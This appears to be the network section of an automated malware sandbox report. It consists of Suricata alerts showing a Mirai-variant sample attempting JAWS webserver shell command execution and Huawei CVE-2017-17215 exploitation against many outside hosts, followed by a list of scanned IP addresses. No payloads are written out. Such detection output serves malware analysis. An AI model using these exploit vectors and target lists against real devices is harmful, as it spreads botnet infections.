              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44666 -> 85.121.137.18:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44666 -> 85.121.137.18:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52310 -> 82.125.57.200:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52310 -> 82.125.57.200:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47132 -> 73.139.51.2:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47132 -> 73.139.51.2:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45580 -> 117.178.215.156:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45580 -> 117.178.215.156:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51260 -> 131.1.57.133:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51260 -> 131.1.57.133:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48084 -> 68.6.178.76:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60120 -> 158.233.52.124:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60120 -> 158.233.52.124:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47146 -> 176.193.153.240:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48084 -> 68.6.178.76:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35574 -> 212.67.182.201:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57346 -> 183.102.78.167:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35574 -> 212.67.182.201:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57346 -> 183.102.78.167:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47146 -> 176.193.153.240:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57450 -> 181.35.247.63:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56774 -> 192.56.187.34:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56774 -> 192.56.187.34:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58514 -> 125.171.187.119:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58514 -> 125.171.187.119:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50164 -> 61.248.12.137:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45242 -> 32.191.176.150:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50164 -> 61.248.12.137:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45242 -> 32.191.176.150:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33356 -> 99.197.232.143:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36992 -> 143.18.61.31:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33356 -> 99.197.232.143:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36992 -> 143.18.61.31:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52336 -> 131.4.227.59:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52336 -> 131.4.227.59:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38832 -> 208.169.18.76:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38832 -> 208.169.18.76:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44556 -> 130.54.234.163:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44556 -> 130.54.234.163:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41132 -> 115.214.19.180:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41132 -> 115.214.19.180:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37830 -> 44.21.167.122:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46312 -> 110.155.123.174:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46312 -> 110.155.123.174:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37830 -> 44.21.167.122:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49894 -> 182.117.155.40:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49894 -> 182.117.155.40:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57252 -> 181.36.218.189:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33860 -> 181.166.140.119:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39950 -> 181.36.65.166:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58796 -> 181.131.119.112:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45798 -> 197.51.150.15:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54304 -> 181.174.17.149:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49562 -> 197.205.191.156:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37282 -> 181.44.186.61:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44240 -> 197.141.14.103:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55374 -> 197.117.143.216:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35252 -> 197.251.89.228:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52502 -> 197.134.88.103:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50350 -> 197.153.24.157:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52878 -> 181.227.175.252:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41550 -> 181.187.174.22:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38172 -> 181.176.206.254:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35052 -> 181.174.202.36:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50640 -> 41.142.27.138:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60038 -> 77.72.21.180:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60038 -> 77.72.21.180:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45286 -> 14.221.84.125:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51440 -> 69.79.130.101:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60164 -> 150.176.156.60:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46554 -> 68.255.124.190:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45286 -> 14.221.84.125:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60164 -> 150.176.156.60:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51440 -> 69.79.130.101:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46554 -> 68.255.124.190:5501
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45768 -> 207.212.58.59:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45768 -> 207.212.58.59:5501
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48264 -> 181.20.244.60:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49116 -> 181.186.32.232:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52074 -> 197.104.253.44:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45740 -> 181.180.43.232:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53286 -> 181.245.195.246:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34160 -> 181.44.80.173:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50484 -> 197.98.103.120:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44096 -> 160.77.43.186:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40690 -> 160.71.204.241:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56436 -> 160.82.240.125:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55326 -> 75.146.4.200:5501
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55326 -> 75.146.4.200:5501
              Source: global trafficTCP traffic: 186.129.156.231 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.247.22.137 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.11.178.136 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.136.135.95 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.82.230.250 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.225.224.98 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.64.108.109 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.198.129.0 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.109.130.115 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.26.129.191 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.67.100.18 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.131.179.174 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.43.148.87 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.237.104.105 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.134.103.136 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.62.52.202 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.208.18.164 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.121.193.246 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.142.154.29 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.206.164.138 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.179.86.254 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.72.122.121 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.151.208.186 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.100.204.184 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.126.117.102 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.32.4.136 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.81.124.79 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.64.147.242 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.178.10.3 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.203.121.253 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.32.31.25 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.97.39.176 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.54.99.66 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.71.202.13 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.205.153.170 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.74.16.153 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.213.184.122 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.86.142.46 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.239.241.54 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.11.110.1 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.162.89.205 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.145.220.98 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.231.43.87 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.131.184.98 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.51.253.131 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.214.48.250 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.232.125.87 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.64.138.241 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.165.248.247 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.56.186.99 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.101.133.173 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.236.224.104 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.49.71.189 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.37.254.217 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.121.67.142 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.8.188.148 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.242.118.65 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.232.220.11 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.231.231.56 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.110.138.199 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.212.169.127 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.20.11.137 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.33.160.39 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.81.212.29 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.233.156.4 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.209.236.173 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.208.174.41 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.155.57.40 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.106.11.248 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.14.241.163 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.166.117.38 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.134.62.23 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.177.190.183 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.210.214.178 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.45.180.209 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.62.91.223 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.8.172.142 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.249.186.225 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.15.101.200 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.149.89.52 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.206.139.122 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.53.187.138 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.131.174.167 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.142.70.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.124.168.45 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.32.126.215 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.185.17.214 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.207.243.12 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.156.234.147 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.160.99.142 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.160.75.236 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.12.13.234 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.234.55.170 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.143.233.174 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.138.22.178 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.144.228.116 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.213.231.173 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.227.124.35 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.30.117.235 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.44.102.146 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.60.252.177 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.254.129.215 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.195.136.148 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.178.144.250 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.243.249.165 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.5.45.214 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.12.149.102 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.37.98.120 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.223.251.232 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.150.96.165 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.9.106.114 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.108.208.255 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.251.156.255 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.7.215.219 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.40.176.169 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.245.217.187 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.74.145.107 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.183.142.124 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.87.51.57 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.109.225.212 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.76.46.114 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.86.125.52 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.5.126.185 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.130.191.97 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.62.64.167 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.51.211.83 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.41.4.231 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.78.186.84 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.54.233.91 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.165.195.140 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.167.242.227 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.116.36.164 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.55.175.193 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.19.41.237 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.199.103.126 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.230.129.221 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.165.20.201 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.119.176.235 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.195.77.36 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.21.162.106 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.34.160.98 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.184.63.4 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.35.14.177 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.211.196.47 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.209.201.112 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.208.182.134 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.252.6.208 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.59.247.70 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.88.128.86 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.43.174.252 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.150.234.236 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.74.170.6 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.54.107.85 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.59.60.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.70.253.2 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.148.129.239 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.10.135.110 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.174.90.91 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.177.11.22 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.239.245.109 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.31.252.247 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.63.217.93 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.35.175.7 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.71.215.14 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.3.26.113 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.232.187.61 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.167.152.75 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.19.125.38 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.17.65.14 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.102.126.207 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.9.133.190 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.199.51.33 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.124.8.29 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.83.45.214 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.3.132.247 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 186.109.25.32 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 41.152.11.163 ports 1,2,3,5,7,37215
